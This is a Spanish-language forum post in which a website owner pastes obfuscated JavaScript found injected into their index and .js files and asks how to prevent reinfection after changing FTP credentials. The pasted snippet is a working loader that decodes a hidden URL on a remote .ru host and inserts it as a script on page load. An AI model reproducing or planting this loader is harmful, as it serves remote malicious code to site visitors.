Hola gente, les cuento, en los archivos index y .js apareció el siguiente código:


/*GNU GPL*/ try{window.onload = function(){var V9vs0ipwfom = document.createElement('script');V9vs0ipwfom.setAttribute('type', 'text/javascript');V9vs0ipwfom.setAttribute('id', 'myscript1');V9vs0ipwfom.setAttribute('src', 'h#&t$^&t#&!^&p$#!#:^/$!!/!&#g))a#(m&!@e!r@)-#)@c&^$o#&(m@^-&^#(t#@#(w^.^w$$r^)!z(&#u&t&()a)(.&#!p@@$&l!!).)@p)#$l$&a^(y)^@^-(c)^^o^!@@m&!(#.)b&#)(r))(o!(w!!#n!#b&&a&&(@g#^b$&&a#&r@@#.$#&(r(u(:$^#8#)0($8!0!&&/((&g)o((&(o@#(g()(l@e!@).^)c^!)@^o^#)m^&!/&)@g#)$!o(o##&g)l#)!e!&@).^(c!(o(!$m^)^/!@&w!@o(^!r(@!(d@#$p!$r$#(!&e)s$^s(!.$o#@(r@g^@!/@!#h@p@^.$c@^o&()m^@)/$#)^s$u)r)v!e)@$y$$m&!!o)(@$n!@k&#@e$(#&$y!#^$.!#c#&o&m!(/&&'.replace(/@|&|\)|\^|#|\(|\$|\!/ig, ''));V9vs0ipwfom.setAttribute('defer', 'defer');document.body.appendChild(V9vs0ipwfom);}} catch(e) {}


del hosting me dijeron q lo elimine, que es un virus y que acto seguido cambie la pw del ftp.
ahora.. cómo puedo evitar que suceda esto???

sé que la pregunta es muy rookie, pero no tengo idea como es que esto se cargó en los sitios... que alguien me tire una cuerda antes de que me ahogue en un vaso de agua.

:)